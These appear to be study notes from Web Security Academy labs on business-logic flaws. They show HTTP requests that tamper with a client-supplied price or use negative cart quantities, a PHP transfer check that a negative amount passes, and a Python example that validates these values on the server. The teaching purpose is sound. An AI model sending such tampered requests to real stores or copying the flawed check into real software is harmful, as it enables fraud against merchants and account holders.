Price Change
Wrong assumption that users will interact with the application only via the interface, so the client-supplied price is trusted as-is.
```http
# Request from user interface
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net

productId=1&redir=PRODUCT&quantity=1&price=133700
```

```http
# Request from Burp Repeater
POST /cart HTTP/1.1
Host: ac5f1ff61e6cd9abc06a2436002000d5.web-security-academy.net

productId=1&redir=PRODUCT&quantity=1&price=1 # Look Here
```
Bank Transfer
An attacker may pass in a negative value and induce unwanted behavior.
```php
<?php
/**
 * Funds transfer between two bank accounts:
 *
 * If the attacker sent -$1000 to the victim's account,
 * this might result in them receiving $1000 from the victim instead.
 */
$transferAmount = $_POST['amount'];   // untrusted, may be negative or non-numeric
$currentBalance = $user->getBalance();

// The only check is "amount does not exceed the balance"; a negative amount
// passes it, so the debit/credit below would be applied with the wrong sign.
if ($transferAmount <= $currentBalance) {
    // transfer proceeds (body not shown on the original page)
} else {
    // insufficient funds
}
```
Negative Quantity
Exploit on a website that doesn't reject negative quantities: a negative line total for one product is used to offset the price of another.
```http
# Request from user interface
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net

productId=1&redir=PRODUCT&quantity=1 # price: 1337
```

```http
# Request from Burp Repeater
POST /cart HTTP/1.1
Host: ac431f0f1f6ffc34c0a2344d00f200ea.web-security-academy.net

productId=2&redir=PRODUCT&quantity=-100 # price: -13
# 1337 - 1300 = 37, which is within the 100 store credit
```
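Server-side handling that closes all three gaps above (price looked up in a server-side catalogue, quantity and transfer amount validated before use), as an added Python example that is not from the lab or the original page; the catalogue, product ids, prices and the `ValidationError`/`rejects` helpers are assumptions of this example.

```python
from decimal import Decimal, InvalidOperation

# Constructed catalogue: the server looks the price up here; a client-supplied
# "price" field is never consulted (product ids and prices are placeholders).
CATALOGUE = {1: Decimal("1337.00"), 2: Decimal("13.00")}

class ValidationError(ValueError):
    """Raised when a client-supplied value breaks a business rule."""

def parse_quantity(raw: str) -> int:
    """Accept only a positive integer; "-100", "0", "1e3" and "" are rejected."""
    if not raw.isdigit():  # str.isdigit() rejects '-', '+', '.', exponents, blanks
        raise ValidationError(f"quantity must be a positive integer, got {raw!r}")
    quantity = int(raw)
    if quantity < 1:
        raise ValidationError("quantity must be at least 1")
    return quantity

def add_to_cart(cart: dict, params: dict) -> Decimal:
    """Add a line to the cart using the server-side price; returns the line total."""
    product_id = params.get("productId", "")
    if not product_id.isdigit() or int(product_id) not in CATALOGUE:
        raise ValidationError("unknown product")
    quantity = parse_quantity(params.get("quantity", ""))  # validated before use
    product_id = int(product_id)
    cart[product_id] = cart.get(product_id, 0) + quantity
    return CATALOGUE[product_id] * quantity

def transfer(sender_balance: Decimal, raw_amount: str) -> Decimal:
    """Return the sender's new balance; rejects NaN, non-positive and overdraft amounts."""
    try:
        amount = Decimal(raw_amount)
    except InvalidOperation:
        raise ValidationError("amount must be a number")
    if not amount.is_finite() or amount <= 0:  # the check the PHP snippet lacks
        raise ValidationError("amount must be a positive number")
    if amount > sender_balance:
        raise ValidationError("insufficient funds")
    return sender_balance - amount

def rejects(fn, *args) -> bool:
    """True if fn(*args) is refused by a business rule (used by the checks)."""
    try:
        fn(*args)
    except ValidationError:
        return True
    return False
```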